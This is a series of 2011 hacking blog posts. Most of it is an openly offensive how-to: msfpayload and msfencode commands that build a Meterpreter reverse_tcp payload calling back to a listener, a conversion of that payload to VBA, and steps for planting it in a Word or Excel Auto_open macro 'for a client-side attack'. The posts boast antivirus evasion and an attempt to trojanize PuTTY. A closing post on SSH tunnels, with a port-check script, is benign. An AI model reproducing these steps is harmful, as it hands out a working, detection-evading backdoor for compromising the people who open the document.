Tuesday, May 24, 2011

(Backdoor Part 3) How to Convert *.EXE Payload into *.VBS Payload

This is how I embedded it.

root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

root@LM:/opt/metasploit3/msf#

root@LM:/opt/metasploit3/msf3# mv payload.exe tools/

root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs

[*] Converted 73802 bytes of EXE into a VBA script

#payload.vbs


Now open MS Word/Excel and perform the following steps.

In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor. If you're using Word/Excel 2007, go to View, Macros, then enter a name like "lancit" and select "Create".

The Visual Basic Editor will pop up; paste the contents of payload.vbs into it and save. Put any text you like in the actual Word document itself, since the purpose is a client-side attack.

The output looks like this:

Sub Auto_open()
.
.
.
.
.
.
End Sub

Then you will get a nice backdoor that antivirus does not detect.

Happy Trying...

(Backdoor Part 2) At last.. Payload CAN'T BE DETECTED..!!

Why can't it be detected? First I encoded it as an *.exe, then I used a Ruby script to embed it inside a *.vbs file. Below is the result from VirusTotal.

File name: payload.vbs
Submission date: 2011-05-23 17:32:43 (UTC)
Current status: finished
Result: 0/42 (0.0%)

Additional information
MD5: 8e54f3b36507c7c3f4a80ee336e367ae
SHA1: ed8ba524a09494dcd7f86dbe5859339706264911
SHA256: 3ff926d2c6dfcee6443de3f0f0916a5ce1d1ccebe6f55399fcb8118758fc041d
ssdeep: 6144:kgwFOmxCAB1vR5CGikL/xz+fk+8yXRruNG63b/IjRuePX7k49TQ7rBlLRc3aT+ch:vwEmwAvvR5CbS/9R+86RruNbLgduePXI
File size: 297145 bytes
First seen: 2011-05-23 17:32:43
Last seen: 2011-05-23 17:32:43
TrID:
Unknown!
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned

Monday, May 23, 2011

(Backdoor Part 1) Not A Successfully Embedded PAYLOAD in PuTTY. But close Enough.. :D

Hi Guys,

Tonight I managed to embed a PAYLOAD inside PuTTY, and according to VirusTotal it got detected (results below).

File name: putty01.exe
Result: 18/42 (42.9%)

The AV engines that detected it are (engine, version, signature date, detection name):

AntiVir 7.11.8.89 2011.05.21 TR/Crypt.XPACK.Gen
Avast 4.8.1351.0 2011.05.22 Win32:Vykuk
Avast5 5.0.677.0 2011.05.22 Win32:Vykuk
BitDefender 7.2 2011.05.22 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.05.22 (Suspicious) - DNAScan
Commtouch 5.3.2.6 2011.05.22 W32/Swrort.D
Comodo 8797 2011.05.22 Heur.Corrupt.PE
DrWeb 5.0.2.03300 2011.05.22 Trojan.Packed.196
eSafe 7.0.17.0 2011.05.22 Suspicious File
F-Prot 4.6.2.117 2011.05.22 W32/Swrort.D
F-Secure 9.0.16440.0 2011.05.22 Backdoor.Shell.AC
GData 22 2011.05.22 Backdoor.Shell.AC
Microsoft 1.6903 2011.05.22 Trojan:Win32/Swrort.A
NOD32 6142 2011.05.22 a variant of Win32/Rozena.AG
Norman 6.07.07 2011.05.22 W32/Swrort.A
nProtect 2011-05-22.01 2011.05.22 Backdoor/W32.Shell.458752
Sophos 4.65.0 2011.05.22 Mal/Swrort-D
VIPRE 9357 2011.05.22 Trojan.Win32.Swrort.B (v)

As you can see from the Microsoft anti-malware result (I think) :P it's detected as a Trojan.

This embedding project is still in progress, and I will keep you updated if I'm not too lazy -.-'

Oops.. It's late already.. off to bed now.. cheerio...

Monday, May 16, 2011

What is SSH and How to Configure an SSH Reverse Tunnel

A simple explanation of SSH.

Secure SHell
A suite of connectivity tools for secure communication over the internet. SSH is a replacement for telnet and rlogin; all communication is encrypted.

Common uses of SSH:

1. You want to access a web interface that lies behind a firewall.

2. You want to secure your communications when you are on a public WLAN.


Steps to take (by problem)
==========================

1. Problem: the server you want to access can only be reached via VPN.

Solution: create a reverse tunnel

Log in to your server over your VPN, then run:

ssh -R 9995:localhost:22 your.ssh-server.net
Once you are logged in on your.ssh-server.net, you can reach the remote server without the VPN:
ssh -p 9995 localhost


2. Forward all your traffic through a tunnel

Connect to your server first:

ssh -D 8888 your.ssh-server.net

Define a SOCKS proxy in your browser settings with host '127.0.0.1' and port '8888'.
Now all your traffic appears to come from that host!
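A check to go with both tunnels above, added here as an example and not part of the original post: with OpenSSH's default GatewayPorts no, the port a -R forward opens on your.ssh-server.net (9995 here) listens on loopback only, so only users logged in on that server can reach the remote host's port 22; the same holds for the -D SOCKS port 8888 on your own machine. The script below parses `ss -ltn` output (the two samples are constructed for this example, not real captures) and reports whether a port is bound to loopback only or also exposed on other addresses.

```shell
#!/bin/sh
# Added example, not from the original post: report whether a forwarded port
# (ssh -R 9995 on your.ssh-server.net, or ssh -D 8888 on your own machine)
# listens on loopback only or on other interfaces as well. Input is `ss -ltn`
# output; the two samples below are constructed, not real captures.
SAMPLE_LOOPBACK='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    127.0.0.1:9995     0.0.0.0:*
LISTEN 0      128    [::1]:9995         [::]:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*'

# What the same tunnel looks like if sshd has GatewayPorts yes:
SAMPLE_EXPOSED='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:9995       0.0.0.0:*
LISTEN 0      128    [::]:9995          [::]:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*'

# tunnel_binds PORT LISTING: print each local address listening on PORT,
# one per line (IPv6 addresses keep their brackets, e.g. "[::1]").
tunnel_binds() {
    printf '%s\n' "$2" | while read -r state rq sq laddr peer; do
        [ "$state" = LISTEN ] || continue             # also skips the header
        case $laddr in
            *:"$1") printf '%s\n' "${laddr%:*}" ;;    # drop the ":PORT" suffix
        esac
    done
}

# tunnel_exposure PORT LISTING: print "none" (nothing listening on PORT),
# "loopback" (only 127.0.0.1 / [::1]) or "exposed" (any other address).
# Exit status is 0 only for "loopback".
tunnel_exposure() {
    result=none
    while read -r addr; do
        [ -n "$addr" ] || continue
        case $addr in
            127.0.0.1|"[::1]") if [ "$result" = none ]; then result=loopback; fi ;;
            *) result=exposed ;;                      # exposed wins over loopback
        esac
    done <<EOF
$(tunnel_binds "$1" "$2")
EOF
    echo "$result"
    [ "$result" = loopback ]
}

# Live use on your.ssh-server.net after the -R command above:
#   tunnel_exposure 9995 "$(ss -ltn)"
tunnel_exposure 9995 "$SAMPLE_LOOPBACK"                                    # loopback
tunnel_exposure 9995 "$SAMPLE_EXPOSED" || echo "9995 reachable from outside"  # exposed
```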

Enjoy!